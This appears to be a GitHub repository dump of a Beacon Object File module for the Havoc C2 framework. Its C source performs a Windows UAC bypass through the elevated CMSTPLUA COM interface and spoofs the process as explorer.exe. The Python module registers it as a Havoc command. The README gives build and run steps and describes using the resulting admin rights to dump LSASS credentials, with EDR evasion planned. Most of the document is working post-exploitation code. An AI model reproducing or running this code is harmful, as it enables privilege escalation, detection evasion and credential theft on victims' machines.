├── src ├── MiniStd.c └── ComExploit │ ├── havoc_uac.py │ └── UACBypassCMSTPLUA.c ├── .gitignore ├── dst └── UACBypassCMSTPLUA.x64.o ├── include ├── Win32Helper.h ├── beacon.h ├── Structs.h └── bofdefs.h ├── Makefile ├── CMakeLists.txt └── README.md /src/MiniStd.c: -------------------------------------------------------------------------------- 1 | #include 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mr-r3bot/bof-modules/HEAD/.gitignore -------------------------------------------------------------------------------- /dst/UACBypassCMSTPLUA.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mr-r3bot/bof-modules/HEAD/dst/UACBypassCMSTPLUA.x64.o -------------------------------------------------------------------------------- /include/Win32Helper.h: -------------------------------------------------------------------------------- 1 | // 2 | // Created by QUANGVO on 9/16/2024. 3 | // 4 | 5 | #ifndef WIN32HELPER_H 6 | #define WIN32HELPER_H 7 | 8 | #endif //WIN32HELPER_H 9 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | module_stomping: 2 | x86_64-w64-mingw32-gcc -c src/ModuleStomping/module_stomping.c -o module_stomping.o 3 | 4 | UACBypass: 5 | x86_64-w64-mingw32-gcc -c src/ComExploit/UACBypassCMSTPLUA.c -o ./dst/UACBypassCMSTPLUA.x64.o 6 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.28) 2 | project(bof_havoc_cs C) 3 | 4 | set(CMAKE_C_STANDARD 23) 5 | 6 | add_executable(bof_havoc_cs src/ModuleStomping/module_stomping.c 7 | include/beacon.h 8 | include/Structs.h 9 | src/ComExploit/UACBypassCMSTPLUA.c 10 | include/Win32Helper.h 11 | src/MiniStd.c 12 | include/bofdefs.h 13 | include/bofdefs.h) 14 | -------------------------------------------------------------------------------- /src/ComExploit/havoc_uac.py: -------------------------------------------------------------------------------- 1 | from havoc import Demon, RegisterCommand, RegisterModule 2 | from os.path import exists 3 | 4 | 5 | def uac_bypass(demon_id, *args): 6 | task_id: str = None 7 | demon: Demon = None 8 | packer: Packer = Packer() 9 | binary: bytes = None 10 | # Get agent id 11 | demon = Demon(demon_id) 12 | shell_path = args[0] 13 | shell_args = args[1] 14 | 15 | packer.addstr(shell_path) 16 | packer.addstr(shell_args) 17 | task_id = demon.ConsoleWrite(demon.CONSOLE_TASK, 18 | f"Tasked demon to execute \"@program: {shell_path}, @args {shell_args}\" using COM ") 19 | # Task the agent to execute the BoF with the entry point being "go" 20 | # and the arguments being the packed arguments buffer 21 | demon.InlineExecute(task_id, "go", f"UACBypassCMSTPLUA.{demon.ProcessArch}.o", packer.getbuffer(), False) 22 | return task_id 23 | 24 | 25 | RegisterModule("uac-lua-bypass", "lateral movement module", "", "[exploit] (args)", "", "") 26 | RegisterCommand(uac_bypass, "uac-lua-bypass", "com_exec", "Bypass UAC using CMSTPLua", 0, "[shell path]", 27 | "cmd.exe whoami /priv") 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Description 2 | This is a BOF file/project for Havoc C2 framework, the purpose is to port a known techinque for UAC bypass, escalate to Local Administrator in Windows using COM 3 | - Ideas and source codes are from: https://github.com/tijme/conferences/tree/master/2024-09%20OrangeCon 4 | 5 | Then place `.o` file in the same directory as your Havoc script. 6 | 7 | *Note: this project is still under development so sorry in advanced for my crappy code :(, it was created as a POC and does not have off-sec features* 8 | 9 | ## Usage 10 | 11 | To build: 12 | ``` 13 | make UACBypass 14 | ``` 15 | 16 | To run: 17 | ``` 18 | uac-lua-bypass com_exec "cmd.exe" "" 19 | ``` 20 | 21 | 22 | ## Ideas for future development 23 | - Dump LSAS using Dup Handle and `MiniWriteDump` 24 | - Implement PPL bypass techniques to dump LSASS with `RunAsPPL=1` 25 | - Implement evasive features and test on EDR 26 | 27 | ## Test in Windows VM with Havoc integration 28 | 29 | Before using `com_exec` to escalate permission, we cannot use `nanodump` tool to dump LSASS 30 | 31 | ![image](https://github.com/user-attachments/assets/8635669d-b2d3-4535-b5c0-5176af51afa8) 32 | 33 | After self-inject beacon again with higher priviledge ( local admin using com_exec ), we are able to dump lsass 34 | 35 | ![image](https://github.com/user-attachments/assets/da5435b1-db7b-438e-acc6-6156ddac4206) 36 | 37 | -------------------------------------------------------------------------------- /src/ComExploit/UACBypassCMSTPLUA.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "../../include/beacon.h" 3 | #include "../../include/Structs.h" 4 | #pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen, memset) 5 | 6 | //------------------------------DEFINING STUFFS-------------------------------------------- 7 | typedef NTSTATUS (NTAPI*_RtlEnterCriticalSection)(PRTL_CRITICAL_SECTION CriticalSection); 8 | 9 | typedef NTSTATUS (NTAPI*_RtlLeaveCriticalSection)(PRTL_CRITICAL_SECTION CriticalSection); 10 | 11 | typedef void (WINAPI*_RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString); 12 | 13 | #define MemCopy __movsb 14 | #define MemSet __stosb 15 | #define PRNT_WN_ERR(szWnApiName) BeaconPrintf(CALLBACK_OUTPUT, "[!] %s Failed With Error: %d \n", szWnApiName, KERNEL32$GetLastError()); 16 | #define PRNT_NT_ERR(szNtApiName, NtErr) BeaconPrintf(CALLBACK_OUTPUT, "[!] %s Failed With Error: 0x%0.8X \n", szNtApiName, NtErr); 17 | 18 | #define DELETE_HANDLE(H) \ 19 | if (H != NULL && H != INVALID_HANDLE_VALUE){ \ 20 | KERNEL32$CloseHandle(H); \ 21 | H = NULL; \ 22 | } 23 | 24 | typedef interface ICMLuaUtil ICMLuaUtil; 25 | 26 | typedef struct ICMLuaUtilVtbl { 27 | BEGIN_INTERFACE 28 | 29 | HRESULT (STDMETHODCALLTYPE*QueryInterface)(__RPC__in ICMLuaUtil *This, __RPC__in REFIID riid, 30 | _COM_Outptr_ void **ppvObject); 31 | 32 | ULONG (STDMETHODCALLTYPE*AddRef)(__RPC__in ICMLuaUtil *This); 33 | 34 | ULONG (STDMETHODCALLTYPE*Release)(__RPC__in ICMLuaUtil *This); 35 | 36 | HRESULT (STDMETHODCALLTYPE*Method1)(__RPC__in ICMLuaUtil *This); 37 | 38 | HRESULT (STDMETHODCALLTYPE*Method2)(__RPC__in ICMLuaUtil *This); 39 | 40 | HRESULT (STDMETHODCALLTYPE*Method3)(__RPC__in ICMLuaUtil *This); 41 | 42 | HRESULT (STDMETHODCALLTYPE*Method4)(__RPC__in ICMLuaUtil *This); 43 | 44 | HRESULT (STDMETHODCALLTYPE*Method5)(__RPC__in ICMLuaUtil *This); 45 | 46 | HRESULT (STDMETHODCALLTYPE*Method6)(__RPC__in ICMLuaUtil *This); 47 | 48 | HRESULT (STDMETHODCALLTYPE*ShellExec)(__RPC__in ICMLuaUtil *This, _In_ LPCTSTR lpFile, 49 | _In_opt_ LPCTSTR lpParameters, _In_opt_ LPCTSTR lpDirectory, _In_ ULONG fMask, 50 | _In_ ULONG nShow); 51 | 52 | END_INTERFACE 53 | } *PICMLuaUtilVtbl; 54 | 55 | /** 56 | * Define ICMLuaUtil interface with ICMLuaUtil VTBL 57 | */ 58 | interface ICMLuaUtil { 59 | CONST_VTBL struct ICMLuaUtilVtbl *lpVtbl; 60 | }; 61 | 62 | //-----------------------------------IMPORTS--------------------------------------- 63 | 64 | DECLSPEC_IMPORT NTSTATUS NTDLL$RtlEnterCriticalSection( 65 | PRTL_CRITICAL_SECTION CriticalSection 66 | ); 67 | 68 | DECLSPEC_IMPORT NTSTATUS NTDLL$RtlLeaveCriticalSection( 69 | PRTL_CRITICAL_SECTION CriticalSection 70 | ); 71 | 72 | DECLSPEC_IMPORT VOID NTDLL$RtlInitUnicodeString( 73 | PUNICODE_STRING DestinationString, 74 | PCWSTR SourceString 75 | ); 76 | 77 | // 78 | DECLSPEC_IMPORT UINT KERNEL32$GetWindowsDirectoryW( 79 | LPWSTR lpBuffer, 80 | UINT uSize 81 | ); 82 | 83 | // 84 | DECLSPEC_IMPORT UINT KERNEL32$GetModuleFileNameW( 85 | HMODULE hModule, 86 | LPWSTR lpFilename, 87 | DWORD nSize 88 | ); 89 | 90 | DECLSPEC_IMPORT int WINAPI KERNEL32$MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCCH lpMultiByteStr, 91 | int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar); 92 | 93 | DECLSPEC_IMPORT LPVOID KERNEL32$VirtualAlloc( 94 | LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect 95 | ); 96 | 97 | DECLSPEC_IMPORT errno_t MSVCRT$wcscat_s( 98 | wchar_t *_Dst, 99 | rsize_t _SizeInWords, 100 | const wchar_t *_Src 101 | ); 102 | 103 | // 104 | DECLSPEC_IMPORT errno_t MSVCRT$wcscpy_s( 105 | wchar_t *_Dst, rsize_t _SizeInWords, const wchar_t *_Src 106 | ); 107 | 108 | DECLSPEC_IMPORT int MSVCRT$_wcsicmp(const wchar_t *_Str1, const wchar_t *_Str2); 109 | 110 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID pvReserved, DWORD dwCoInit); 111 | 112 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); 113 | 114 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize(void); 115 | 116 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, 117 | SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, 118 | DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, 119 | DWORD dwCapabilities, void *pReserved3); 120 | 121 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, 122 | REFIID riid, LPVOID *ppv); 123 | 124 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCOLESTR lpsz, LPCLSID pclsid); 125 | 126 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPCOLESTR lpsz, LPIID lpiid); 127 | 128 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv); 129 | 130 | DECLSPEC_IMPORT int WINAPI OLE32$StringFromGUID2(REFGUID rguid, LPOLESTR lpsz, int cchMax); 131 | 132 | /* 133 | *Use https://github.com/vxunderground/VX-API/blob/main/VX-API/CreateWindowsObjectPath.cpp 134 | *Use VX-API instead of importing from dll for evasive purpose 135 | * 136 | */ 137 | //-------------------------------------------------------------------------- 138 | 139 | 140 | PEB *GetPeb() { 141 | #ifdef _M_X64 142 | return (void *) __readgsqword(0x60); 143 | #elif _M_IX86 144 | return (void*)__readfsdword(0x30); 145 | #endif 146 | } 147 | 148 | SIZE_T CharStringToWCharString(PWCHAR Destination, PCHAR Source, SIZE_T MaximumAllowed) { 149 | INT Length = MaximumAllowed; 150 | 151 | while (--Length >= 0) { 152 | if (!(*Destination++ = *Source++)) 153 | return MaximumAllowed - Length - 1; 154 | } 155 | 156 | return MaximumAllowed - Length; 157 | } 158 | 159 | // spoof process 160 | BOOL SpoofExplorerProcess() { 161 | BeaconPrintf(CALLBACK_OUTPUT, "\t Getting explorer.exe path \n"); 162 | WCHAR chExplorerPath[MAX_PATH]; 163 | KERNEL32$GetWindowsDirectoryW(chExplorerPath, MAX_PATH); 164 | MSVCRT$wcscat_s(chExplorerPath, sizeof(chExplorerPath) / sizeof(wchar_t), L"\\explorer.exe"); 165 | KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 166 | LPWSTR pwExplorerPath = (LPWSTR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 167 | MSVCRT$wcscpy_s(pwExplorerPath, MAX_PATH, chExplorerPath); 168 | BeaconPrintf(CALLBACK_OUTPUT, "Explorer.exe path: %S \n", pwExplorerPath); 169 | PEB *pPeb = GetPeb(); 170 | NTSTATUS STATUS = NTDLL$RtlEnterCriticalSection(pPeb->FastPebLock); 171 | if (STATUS != 0x00) { 172 | return FALSE; 173 | } 174 | BeaconPrintf(CALLBACK_OUTPUT, "\t- Masquerading ImagePathName and CommandLine.\n"); 175 | // Change path name to explorer 176 | NTDLL$RtlInitUnicodeString(&pPeb->ProcessParameters->ImagePathName, chExplorerPath); 177 | NTDLL$RtlInitUnicodeString(&pPeb->ProcessParameters->CommandLine, chExplorerPath); 178 | 179 | PLDR_DATA_TABLE_ENTRY pStartModuleInfo = (PLDR_DATA_TABLE_ENTRY) pPeb->LoaderData->InLoadOrderModuleList.Flink; 180 | PLDR_DATA_TABLE_ENTRY pNextModuleInfo = (PLDR_DATA_TABLE_ENTRY) pPeb->LoaderData->InLoadOrderModuleList.Flink; 181 | 182 | WCHAR wExeFileName[MAX_PATH]; 183 | KERNEL32$GetModuleFileNameW(NULL, wExeFileName, MAX_PATH); 184 | 185 | do { 186 | if (MSVCRT$_wcsicmp(wExeFileName, pNextModuleInfo->FullDllName.Buffer) == 0) { 187 | BeaconPrintf(CALLBACK_OUTPUT, "\t- Masquerading FullDllName and BaseDllName.\n"); 188 | NTDLL$RtlInitUnicodeString(&pNextModuleInfo->FullDllName, pwExplorerPath); 189 | NTDLL$RtlInitUnicodeString(&pNextModuleInfo->BaseDllName, pwExplorerPath); 190 | break; 191 | } 192 | 193 | pNextModuleInfo = (PLDR_DATA_TABLE_ENTRY) pNextModuleInfo->InLoadOrderLinks.Flink; 194 | } while (pNextModuleInfo != pStartModuleInfo); 195 | 196 | NTDLL$RtlLeaveCriticalSection(pPeb->FastPebLock); 197 | return TRUE; 198 | } 199 | 200 | HRESULT ComUacBypass(PWCHAR pszProgram, PWCHAR pszArguments) { 201 | HRESULT hResult = 0x00; 202 | ICMLuaUtil *pICMLuaUtil = NULL; 203 | IID hIID_ICMLuaUtil; 204 | IBindCtx *iBindContext = NULL; 205 | IMoniker *iMoniker = NULL; 206 | BIND_OPTS3 sBindingOpts; 207 | hResult = OLE32$CoInitialize(NULL); 208 | 209 | if (hResult < 0) { 210 | BeaconPrintf(CALLBACK_ERROR, "[!] CoInitilize failed 0x%X.\n", hResult); 211 | goto CLEANUP_AND_RETURN; 212 | } 213 | 214 | if (OLE32$IIDFromString(L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}", &hIID_ICMLuaUtil) != 0x00) { 215 | BeaconPrintf(CALLBACK_ERROR, "[!] Could not get IID from ICMLuaUtil GUID \n"); 216 | goto CLEANUP_AND_RETURN; 217 | } 218 | MemSet((PVOID) &sBindingOpts, 0, sizeof(sBindingOpts)); 219 | sBindingOpts.cbStruct = sizeof(sBindingOpts); 220 | sBindingOpts.dwClassContext = CLSCTX_LOCAL_SERVER; 221 | hResult = OLE32$CoGetObject(L"Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", 222 | (BIND_OPTS *) &sBindingOpts, &hIID_ICMLuaUtil, (void **) &pICMLuaUtil); 223 | if (hResult < 0x00) { 224 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to run CoGetObject: 0x%X.\n", hResult); 225 | goto CLEANUP_AND_RETURN; 226 | } 227 | 228 | // Copy the actual file 229 | hResult = pICMLuaUtil->lpVtbl->ShellExec(pICMLuaUtil, (LPSTR) pszProgram, (LPSTR) pszArguments, NULL, 230 | SEE_MASK_DEFAULT, SW_SHOW); 231 | if (hResult < 0x00) { 232 | BeaconPrintf(CALLBACK_ERROR, "[!] Failed to run ShellExec: 0x%X.\n", hResult); 233 | goto CLEANUP_AND_RETURN; 234 | } 235 | 236 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Succesfully executed shell!"); 237 | CLEANUP_AND_RETURN: 238 | if (pICMLuaUtil != NULL) pICMLuaUtil->lpVtbl->Release(pICMLuaUtil); 239 | if (iMoniker != NULL) iMoniker->lpVtbl->Release(iMoniker); 240 | if (iBindContext != NULL) iBindContext->lpVtbl->Release(iBindContext); 241 | OLE32$CoUninitialize(); 242 | return hResult; 243 | }; 244 | 245 | void go(char *args, int argc) { 246 | datap Parser = {0}; 247 | DWORD Length = {0}; 248 | PSTR executePath = { 0 }; 249 | PSTR shellArgs = {0}; 250 | PWCHAR pszProgram = (PWCHAR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 251 | PWCHAR pszArgs= (PWCHAR) KERNEL32$VirtualAlloc(NULL, MAX_PATH, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 252 | 253 | // Parse arguments 254 | BeaconDataParse(&Parser, args, argc); 255 | executePath = BeaconDataExtract(&Parser, &Length); 256 | shellArgs = BeaconDataExtract(&Parser, &Length); 257 | 258 | CharStringToWCharString(pszProgram, executePath, MAX_PATH); 259 | CharStringToWCharString(pszArgs, shellArgs, MAX_PATH); 260 | 261 | if (!SpoofExplorerProcess()) { 262 | BeaconPrintf(CALLBACK_ERROR, "Spoofing process explorere failed \n"); 263 | } 264 | if (ComUacBypass(pszProgram, pszArgs) == 0x00) { 265 | BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully launched %S %S\n", pszProgram, pszArgs); 266 | } 267 | } 268 | 269 | -------------------------------------------------------------------------------- /include/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Additional BOF resources are available here: 8 | * - https://github.com/Cobalt-Strike/bof_template 9 | * 10 | * Cobalt Strike 4.x 11 | * ChangeLog: 12 | * 1/25/2022: updated for 4.5 13 | * 7/18/2023: Added BeaconInformation API for 4.9 14 | * 7/31/2023: Added Key/Value store APIs for 4.9 15 | * BeaconAddValue, BeaconGetValue, and BeaconRemoveValue 16 | * 8/31/2023: Added Data store APIs for 4.9 17 | * BeaconDataStoreGetItem, BeaconDataStoreProtectItem, 18 | * BeaconDataStoreUnprotectItem, and BeaconDataStoreMaxEntries 19 | * 9/01/2023: Added BeaconGetCustomUserData API for 4.9 20 | * 3/21/2024: Updated BeaconInformation API for 4.10 to return a BOOL 21 | * Updated the BEACON_INFO data structure to add new parameters 22 | * 4/19/2024: Added BeaconGetSyscallInformation API for 4.10 23 | * 4/25/2024: Added APIs to call Beacon's system call implementation 24 | */ 25 | #ifndef _BEACON_H_ 26 | #define _BEACON_H_ 27 | #include 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif // __cplusplus 32 | 33 | /* data API */ 34 | typedef struct { 35 | char * original; /* the original buffer [so we can free it] */ 36 | char * buffer; /* current pointer into our buffer */ 37 | int length; /* remaining length of data */ 38 | int size; /* total size of this buffer */ 39 | } datap; 40 | 41 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 42 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 43 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 44 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 45 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 46 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 47 | 48 | /* format API */ 49 | typedef struct { 50 | char * original; /* the original buffer [so we can free it] */ 51 | char * buffer; /* current pointer into our buffer */ 52 | int length; /* remaining length of data */ 53 | int size; /* total size of this buffer */ 54 | } formatp; 55 | 56 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 57 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 58 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, const char * text, int len); 59 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, const char * fmt, ...); 60 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 61 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 62 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 63 | 64 | /* Output Functions */ 65 | #define CALLBACK_OUTPUT 0x0 66 | #define CALLBACK_OUTPUT_OEM 0x1e 67 | #define CALLBACK_OUTPUT_UTF8 0x20 68 | #define CALLBACK_ERROR 0x0d 69 | #define CALLBACK_CUSTOM 0x1000 70 | #define CALLBACK_CUSTOM_LAST 0x13ff 71 | 72 | 73 | DECLSPEC_IMPORT void BeaconOutput(int type, const char * data, int len); 74 | DECLSPEC_IMPORT void BeaconPrintf(int type, const char * fmt, ...); 75 | 76 | 77 | /* Token Functions */ 78 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 79 | DECLSPEC_IMPORT void BeaconRevertToken(); 80 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 81 | 82 | /* Spawn+Inject Functions */ 83 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 84 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 85 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 86 | DECLSPEC_IMPORT BOOL BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFO * si, PROCESS_INFORMATION * pInfo); 87 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 88 | 89 | /* Utility Functions */ 90 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 91 | 92 | /* Beacon Information */ 93 | /* 94 | * ptr - pointer to the base address of the allocated memory. 95 | * size - the number of bytes allocated for the ptr. 96 | */ 97 | typedef struct { 98 | char * ptr; 99 | size_t size; 100 | } HEAP_RECORD; 101 | #define MASK_SIZE 13 102 | 103 | /* Information the user can set in the USER_DATA via a UDRL */ 104 | typedef enum { 105 | PURPOSE_EMPTY, 106 | PURPOSE_GENERIC_BUFFER, 107 | PURPOSE_BEACON_MEMORY, 108 | PURPOSE_SLEEPMASK_MEMORY, 109 | PURPOSE_BOF_MEMORY, 110 | PURPOSE_USER_DEFINED_MEMORY = 1000 111 | } ALLOCATED_MEMORY_PURPOSE; 112 | 113 | typedef enum { 114 | LABEL_EMPTY, 115 | LABEL_BUFFER, 116 | LABEL_PEHEADER, 117 | LABEL_TEXT, 118 | LABEL_RDATA, 119 | LABEL_DATA, 120 | LABEL_PDATA, 121 | LABEL_RELOC, 122 | LABEL_USER_DEFINED = 1000 123 | } ALLOCATED_MEMORY_LABEL; 124 | 125 | typedef enum { 126 | METHOD_UNKNOWN, 127 | METHOD_VIRTUALALLOC, 128 | METHOD_HEAPALLOC, 129 | METHOD_MODULESTOMP, 130 | METHOD_NTMAPVIEW, 131 | METHOD_USER_DEFINED = 1000, 132 | } ALLOCATED_MEMORY_ALLOCATION_METHOD; 133 | 134 | /** 135 | * This structure allows the user to provide additional information 136 | * about the allocated heap for cleanup. It is mandatory to provide 137 | * the HeapHandle but the DestroyHeap Boolean can be used to indicate 138 | * whether the clean up code should destroy the heap or simply free the pages. 139 | * This is useful in situations where a loader allocates memory in the 140 | * processes current heap. 141 | */ 142 | typedef struct _HEAPALLOC_INFO { 143 | PVOID HeapHandle; 144 | BOOL DestroyHeap; 145 | } HEAPALLOC_INFO, *PHEAPALLOC_INFO; 146 | 147 | typedef struct _MODULESTOMP_INFO { 148 | HMODULE ModuleHandle; 149 | } MODULESTOMP_INFO, *PMODULESTOMP_INFO; 150 | 151 | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION { 152 | HEAPALLOC_INFO HeapAllocInfo; 153 | MODULESTOMP_INFO ModuleStompInfo; 154 | PVOID Custom; 155 | } ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION; 156 | 157 | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION { 158 | BOOL Cleanup; 159 | ALLOCATED_MEMORY_ALLOCATION_METHOD AllocationMethod; 160 | ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION AdditionalCleanupInformation; 161 | } ALLOCATED_MEMORY_CLEANUP_INFORMATION, *PALLOCATED_MEMORY_CLEANUP_INFORMATION; 162 | 163 | typedef struct _ALLOCATED_MEMORY_SECTION { 164 | ALLOCATED_MEMORY_LABEL Label; // A label to simplify Sleepmask development 165 | PVOID BaseAddress; // Pointer to virtual address of section 166 | SIZE_T VirtualSize; // Virtual size of the section 167 | DWORD CurrentProtect; // Current memory protection of the section 168 | DWORD PreviousProtect; // The previous memory protection of the section (prior to masking/unmasking) 169 | BOOL MaskSection; // A boolean to indicate whether the section should be masked 170 | } ALLOCATED_MEMORY_SECTION, *PALLOCATED_MEMORY_SECTION; 171 | 172 | typedef struct _ALLOCATED_MEMORY_REGION { 173 | ALLOCATED_MEMORY_PURPOSE Purpose; // A label to indicate the purpose of the allocated memory 174 | PVOID AllocationBase; // The base address of the allocated memory block 175 | SIZE_T RegionSize; // The size of the allocated memory block 176 | DWORD Type; // The type of memory allocated 177 | ALLOCATED_MEMORY_SECTION Sections[8]; // An array of section information structures 178 | ALLOCATED_MEMORY_CLEANUP_INFORMATION CleanupInformation; // Information required to cleanup the allocation 179 | } ALLOCATED_MEMORY_REGION, *PALLOCATED_MEMORY_REGION; 180 | 181 | typedef struct { 182 | ALLOCATED_MEMORY_REGION AllocatedMemoryRegions[6]; 183 | } ALLOCATED_MEMORY, *PALLOCATED_MEMORY; 184 | 185 | /* 186 | * version - The version of the beacon dll was added for release 4.10 187 | * version format: 0xMMmmPP, where MM = Major, mm = Minor, and PP = Patch 188 | * e.g. 0x040900 -> CS 4.9 189 | * 0x041000 -> CS 4.10 190 | * 191 | * sleep_mask_ptr - pointer to the sleep mask base address 192 | * sleep_mask_text_size - the sleep mask text section size 193 | * sleep_mask_total_size - the sleep mask total memory size 194 | * 195 | * beacon_ptr - pointer to beacon's base address 196 | * The stage.obfuscate flag affects this value when using CS default loader. 197 | * true: beacon_ptr = allocated_buffer - 0x1000 (Not a valid address) 198 | * false: beacon_ptr = allocated_buffer (A valid address) 199 | * For a UDRL the beacon_ptr will be set to the 1st argument to DllMain 200 | * when the 2nd argument is set to DLL_PROCESS_ATTACH. 201 | * heap_records - list of memory addresses on the heap beacon wants to mask. 202 | * The list is terminated by the HEAP_RECORD.ptr set to NULL. 203 | * mask - the mask that beacon randomly generated to apply 204 | * 205 | * Added in version 4.10 206 | * allocatedMemory - An ALLOCATED_MEMORY structure that can be set in the USER_DATA 207 | * via a UDRL. 208 | */ 209 | typedef struct { 210 | unsigned int version; 211 | char * sleep_mask_ptr; 212 | DWORD sleep_mask_text_size; 213 | DWORD sleep_mask_total_size; 214 | 215 | char * beacon_ptr; 216 | HEAP_RECORD * heap_records; 217 | char mask[MASK_SIZE]; 218 | 219 | ALLOCATED_MEMORY allocatedMemory; 220 | } BEACON_INFO, *PBEACON_INFO; 221 | 222 | DECLSPEC_IMPORT BOOL BeaconInformation(PBEACON_INFO info); 223 | 224 | /* Key/Value store functions 225 | * These functions are used to associate a key to a memory address and save 226 | * that information into beacon. These memory addresses can then be 227 | * retrieved in a subsequent execution of a BOF. 228 | * 229 | * key - the key will be converted to a hash which is used to locate the 230 | * memory address. 231 | * 232 | * ptr - a memory address to save. 233 | * 234 | * Considerations: 235 | * - The contents at the memory address is not masked by beacon. 236 | * - The contents at the memory address is not released by beacon. 237 | * 238 | */ 239 | DECLSPEC_IMPORT BOOL BeaconAddValue(const char * key, void * ptr); 240 | DECLSPEC_IMPORT void * BeaconGetValue(const char * key); 241 | DECLSPEC_IMPORT BOOL BeaconRemoveValue(const char * key); 242 | 243 | /* Beacon Data Store functions 244 | * These functions are used to access items in Beacon's Data Store. 245 | * BeaconDataStoreGetItem returns NULL if the index does not exist. 246 | * 247 | * The contents are masked by default, and BOFs must unprotect the entry 248 | * before accessing the data buffer. BOFs must also protect the entry 249 | * after the data is not used anymore. 250 | * 251 | */ 252 | 253 | #define DATA_STORE_TYPE_EMPTY 0 254 | #define DATA_STORE_TYPE_GENERAL_FILE 1 255 | 256 | typedef struct { 257 | int type; 258 | DWORD64 hash; 259 | BOOL masked; 260 | char* buffer; 261 | size_t length; 262 | } DATA_STORE_OBJECT, *PDATA_STORE_OBJECT; 263 | 264 | DECLSPEC_IMPORT PDATA_STORE_OBJECT BeaconDataStoreGetItem(size_t index); 265 | DECLSPEC_IMPORT void BeaconDataStoreProtectItem(size_t index); 266 | DECLSPEC_IMPORT void BeaconDataStoreUnprotectItem(size_t index); 267 | DECLSPEC_IMPORT size_t BeaconDataStoreMaxEntries(); 268 | 269 | /* Beacon User Data functions */ 270 | DECLSPEC_IMPORT char * BeaconGetCustomUserData(); 271 | 272 | /* Beacon System call */ 273 | /* Syscalls API */ 274 | typedef struct 275 | { 276 | PVOID fnAddr; 277 | PVOID jmpAddr; 278 | DWORD sysnum; 279 | } SYSCALL_API_ENTRY, *PSYSCALL_API_ENTRY; 280 | 281 | typedef struct 282 | { 283 | SYSCALL_API_ENTRY ntAllocateVirtualMemory; 284 | SYSCALL_API_ENTRY ntProtectVirtualMemory; 285 | SYSCALL_API_ENTRY ntFreeVirtualMemory; 286 | SYSCALL_API_ENTRY ntGetContextThread; 287 | SYSCALL_API_ENTRY ntSetContextThread; 288 | 